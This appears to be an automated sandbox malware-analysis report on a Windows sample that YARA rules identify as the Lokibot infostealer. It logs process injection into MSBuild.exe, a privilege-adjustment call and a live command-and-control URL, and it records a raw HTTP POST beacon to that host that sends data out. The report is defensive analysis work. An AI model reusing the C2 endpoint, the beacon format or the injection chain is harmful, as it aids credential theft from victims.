                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:27:13 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ErifryXAmgjblGKi53wYAZQGp5R0%2FcoEwdCAEmo%2B3PEt8ccX1SQwBVBDrhf3JXDokdIeALxvnXr9LY9Y%2B%2BdMazki75oG5oEAuTg9frnxiTK9PR5x3rp2NCmCFSel"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd733527cc439e1-CDGalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:27:14 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EXDyk6top6qwvTX4C%2BdfwAf8npHR6pwJr%2B0jFvkC9D2m%2FymaoLo63V59bdofbjosNWHEL118cPpmwm10onxw0NtO8vvtUPpdJSxtUCkRu0pgSyTCmbpvEPGUMfkc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7335b3af63b4f-CDGalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:27:16 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AlYDfsN5GbpkMBD6h7eHRDqKqcOppS2kibcwZqb8eUC4CHNpLCvKM2GC379K5up1i8eTxZKvZB1ya%2B3ZUAnQEdmJEWsjJFoZZJWNtZSVT%2FgyS558TJdheyVjERsc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7336448f48741-DUSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:27:17 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PMcBahuKByTbFosahzRIKypVcDYCLDFflrd1nc56iJvyDP%2Bh45WlKRRvvhMXjJh88q4YEHytsOIDoJi3TTV5f1VcbhoAXrQ2PqU%2BzYC9KTSSSp7XyiTuJZcFrnIz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7336d1a925c80-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 13:27:18 GMTContent-Type: text/html; charset=UTF-8Connection: closestatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BgDckXZkiAvUVc%2BKzyt786ncrFUI%2B0WkMGYATSCVOlSWpwMf4HbqhvSUOnvBxN2h6OKRG2Xr0rlUZTCPS16lMYSOpIyP29QS5FsrDWfOFvEA1ONpOtQWgmdsJ30%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd7337598bd699b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                Source: unknownTCP traffic detected without corresponding DNS query: 178.79.242.0
                Source: unknownTCP traffic detected without corresponding DNS query: 178.79.242.0
                Source: unknownTCP traffic detected without corresponding DNS query: 41.63.96.0
                Source: unknownTCP traffic detected without corresponding DNS query: 41.63.96.0
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.5.146
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, MSBuild.exe, 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: MSBuild.exe, 00000001.00000003.912712632.0000000000C71000.00000004.00000001.sdmp, MSBuild.exe, 00000001.00000002.931524963.00000000004A0000.00000040.00000001.sdmpString found in binary or memory: https://jnxxx1.xyz/JRM/w2/fre.php
                Source: unknownHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 190Connection: close
                Source: unknownDNS traffic detected: queries for: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00404ED4 recv,

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 1.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.672292880.000000001270F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000000.668425098.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000000.668425098.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000000.669222842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000000.669222842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000000.668771421.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000000.668771421.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.670595515.000000000275A000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: gunzipped.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: 1.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 1.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 1.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 1.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 1.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 1.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 1.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.672292880.000000001270F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000000.668425098.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000000.668425098.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000000.669222842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000000.669222842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000000.668771421.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000000.668771421.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.670595515.000000000275A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_00007FFA363D17D5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040549C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004029D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00405B6F appears 42 times
                Source: gunzipped.exe, 00000000.00000002.670076841.000000000093A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs gunzipped.exe
                Source: gunzipped.exe, 00000000.00000000.662111954.000000000041A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLLLOOOLKKIIII.exe4 vs gunzipped.exe
                Source: gunzipped.exe, 00000000.00000002.670163943.0000000000A40000.00000004.00020000.sdmpBinary or memory string: OriginalFilename vs gunzipped.exe
                Source: gunzipped.exe, 00000000.00000002.670315004.00000000026A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs gunzipped.exe
                Source: gunzipped.exe, 00000000.00000002.672382490.0000000012729000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs gunzipped.exe
                Source: gunzipped.exe, 00000000.00000002.670201733.0000000000A90000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs gunzipped.exe
                Source: gunzipped.exeBinary or memory string: OriginalFilenameLLLOOOLKKIIII.exe4 vs gunzipped.exe
                Source: gunzipped.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: gunzipped.exeStatic PE information: invalid certificate
                Source: gunzipped.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: gunzipped.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\Desktop\gunzipped.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\gunzipped.exe.logJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@60/3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
                Source: 1.2.MSBuild.exe.510000.1.unpack, Microsoft.Build/CommandLine/OutOfProcTaskHostNode.csTask registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
                Source: 1.2.MSBuild.exe.510000.1.unpack, Microsoft.Build/Shared/TaskLoader.csTask registration methods: 'CreateTask'
                Source: 1.2.MSBuild.exe.510000.1.unpack, Microsoft.Build/BackEnd/TaskParameter.csTask registration methods: 'CreateNewTaskItemFrom'
                Source: 1.2.MSBuild.exe.510000.1.unpack, Microsoft.Build/Shared/RegisteredTaskObjectCacheBase.csTask registration methods: '.cctor', 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', '.ctor', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
                Source: 1.2.MSBuild.exe.510000.1.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 1.2.MSBuild.exe.510000.1.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
                Source: 1.2.MSBuild.exe.510000.1.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
                Source: 1.2.MSBuild.exe.510000.1.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
